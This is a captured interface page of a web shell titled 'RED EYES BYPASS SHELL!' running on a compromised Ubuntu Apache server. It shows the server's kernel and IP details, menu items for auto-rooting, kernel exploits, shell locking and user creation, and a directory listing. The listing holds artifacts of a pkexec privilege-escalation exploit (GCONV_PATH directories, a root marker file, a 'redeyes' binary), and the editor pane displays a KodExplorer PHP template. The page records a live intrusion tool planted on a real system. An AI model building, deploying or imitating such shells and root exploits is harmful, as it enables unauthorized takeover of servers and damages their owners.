Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
template /
share /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
edit.html
4.57
KB
-rwxr-xr-x
editor.html
2.33
KB
-rwxr-xr-x
explorer.html
2.2
KB
-rwxr-xr-x
explorerWap.html
2.51
KB
-rwxr-xr-x
file.html
1.71
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
tips.html
1.1
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : explorer.html
<?php include(TEMPLATE.'common/header.html');?> <title><?php echo clear_html($shareInfo['name']).' - '.LNG('share_title').' - '.strip_tags(LNG('kod_name')).LNG('kod_power_by');?></title> <link rel="stylesheet" href="<?php echo STATIC_PATH;?>style/skin/base/app_explorer.css?ver=<?php echo KOD_VERSION;?>"/> <link rel="stylesheet" href="<?php echo STATIC_PATH;?>style/skin/<?php echo $configTheme;?>.css?ver=<?php echo KOD_VERSION;?>" id='link-theme-style'/> </head> <style> .frame-main .frame-left {bottom: 0px;} .frame-main .bottom-box{display:none !important;} .tools-right #set_theme{display:none !important;} #PV_rotate_Left,#PV_rotate_Right,#PV_Btn_Remove{display:none !important;} <?php if(isset($_GET['type'])){?> .topbar,.common-footer,.bottom-box{display:none;} .frame-header{top:0;} .frame-main{top:0px;bottom:0px;} .frame-main .frame-left #folder-list-tree{bottom:5px;} <?php if($_GET['type']=="explorer"){?> .frame-header .header-content .header-left{display:none;} .frame-header .header-content .header-middle{left:12px;} .frame-main .frame-left,.frame-main .frame-resize{display:none;} .frame-main .frame-right{left:0px;} .task-tab{display:none;} <?php } ?> <?php if($_GET['type']=="fileList"){?> .frame-header{display:none;} .frame-main .frame-left,.frame-main .frame-resize{display:none;} .frame-main .frame-right{left:0px;} .frame-main{top:0px;} .task-tab,#set_theme,#fav,#home{display:none !important;} .header-middle{top:3px;left:5px;right:140px;} #list-type-header{top:35px;} <?php } ?> <?php } ?> </style> <body style="overflow:hidden;" oncontextmenu="return core.contextmenu();" id="page-explorer"> <?php include(TEMPLATE.'common/navbarShare.html');?> <?php include(TEMPLATE.'explorer/content.html');?> <?php include(TEMPLATE.'common/footer.html');?> <script type="text/javascript" > AUTH = {'explorer.fileDownload':<?php echo clear_html($canDownload);?>}; G.thisPath = "<?php echo clear_html($dir);?>"; G.user = "<?php echo clear_html($_GET['user']);?>"; G.sid = "<?php echo clear_html($_GET['sid']);?>"; G.shareInfo = <?php echo json_encode($shareInfo);?>; G.theme = "<?php echo $configTheme;?>"; seajs.use("app/src/shareExplorer/main"); </script> </body> </html>
Close